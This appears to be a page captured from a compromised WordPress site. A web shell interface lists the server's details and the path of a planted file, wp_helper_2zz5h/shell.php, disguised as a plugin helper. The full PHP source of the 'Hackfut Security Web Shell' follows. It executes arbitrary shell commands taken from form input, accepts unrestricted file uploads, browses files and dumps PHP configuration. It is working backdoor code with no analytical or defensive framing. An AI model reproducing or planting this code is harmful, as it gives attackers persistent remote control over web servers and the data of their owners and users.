HEX

Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit - prohibited by configuration in /home/u547966/brikov.ru/www/wp-content/plugins/admin-menu-editor/menu-editor.php on line 745
Server: Apache
System: Linux 4.19.0-0.bpo.9-amd64 x86_64 at red40
User: u547966 (5490)
PHP: 5.3.29-mh2
Disabled: syslog, dl, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, chown, chgrp, accelerator_reset, opcache_reset, accelerator_get_status, opcache_get_status, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority
Upload Files
File: //proc/self/cwd/wp-content/plugins/wp_helper_2zz5h/shell.php
<?php
/* ⚡ Hackfut Security Web Shell ⚡ */
error_reporting(0);
@ini_set('display_errors', 0);
echo '<!DOCTYPE html><html><head><title>⚡ Hackfut Security Web Shell</title>';
echo '<style>body{background:#0a0a12;color:#00ffea;font-family:Consolas,monospace;padding:20px;}';
echo 'pre{background:#1a1a2a;padding:10px;border-radius:5px;}';
echo 'input,textarea,select{background:#1a1a2a;color:#00ffea;border:1px solid #00ffea;padding:5px;margin:5px;}';
echo 'button{background:#ff00ff;color:#0a0a12;border:none;padding:8px 15px;cursor:pointer;font-weight:bold;}';
echo '.success{color:#00ff00;}.error{color:#ff0066;}.warning{color:#ffcc00;}';
echo '</style></head><body>';

echo '<h1>⚡ Hackfut Security Web Shell</h1>';
echo '<div style="background:#1a1a2a;padding:15px;border-radius:5px;margin-bottom:20px;">';
echo '<pre>'.php_uname().'</pre>';
echo '<p>📂 '.getcwd().'</p>';
echo '<p>🐘 PHP '.phpversion().'</p>';
echo '</div>';

// Command execution
echo '<div style="margin-bottom:20px;">';
echo '<h2>⚡ Command Execution</h2>';
echo '<form method="post">';
echo '<input type="text" name="cmd" style="width:70%" placeholder="Enter command">';
echo '<button type="submit">🚀 Execute</button>';
echo '</form>';

if(isset($_POST['cmd'])){
    echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;margin-top:10px;">';
    echo '<pre>'.shell_exec($_POST['cmd']).'</pre>';
    echo '</div>';
}
echo '</div>';

// File upload
echo '<div style="margin-bottom:20px;">';
echo '<h2>📤 File Upload</h2>';
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="f">';
echo '<button type="submit">📤 Upload</button>';
echo '</form>';

if(isset($_FILES['f']) && $_FILES['f']['name']){
    $target = basename($_FILES['f']['name']);
    if(move_uploaded_file($_FILES['f']['tmp_name'], $target)){
        echo '<p class="success">✅ Upload successful: <a href="'.$target.'" style="color:#00ffea;">'.$target.'</a></p>';
    }else{
        echo '<p class="error">❌ Upload failed</p>';
    }
}
echo '</div>';

// File manager
echo '<div style="margin-bottom:20px;">';
echo '<h2>📁 File Manager</h2>';
echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;max-height:300px;overflow:auto;">';
$files = scandir('.');
foreach($files as $file){
    if($file == '.' || $file == '..') continue;
    $color = is_dir($file) ? "#ff00ff" : "#00ffea";
    $size = is_dir($file) ? "DIR" : filesize($file)." bytes";
    echo '<div style="padding:3px;"><span style="color:'.$color.';">'.$file.'</span> - '.$size.'</div>';
}
echo '</div>';
echo '</div>';

// PHP info
echo '<div>';
echo '<h2>🐘 PHP Information</h2>';
echo '<form method="post">';
echo '<button type="submit" name="phpinfo">📊 Show PHP Info</button>';
echo '</form>';

if(isset($_POST['phpinfo'])){
    ob_start();
    phpinfo();
    $phpinfo = ob_get_contents();
    ob_end_clean();
    echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;margin-top:10px;overflow:auto;max-height:400px;">';
    echo $phpinfo;
    echo '</div>';
}
echo '</div>';

echo '</body></html>';
?>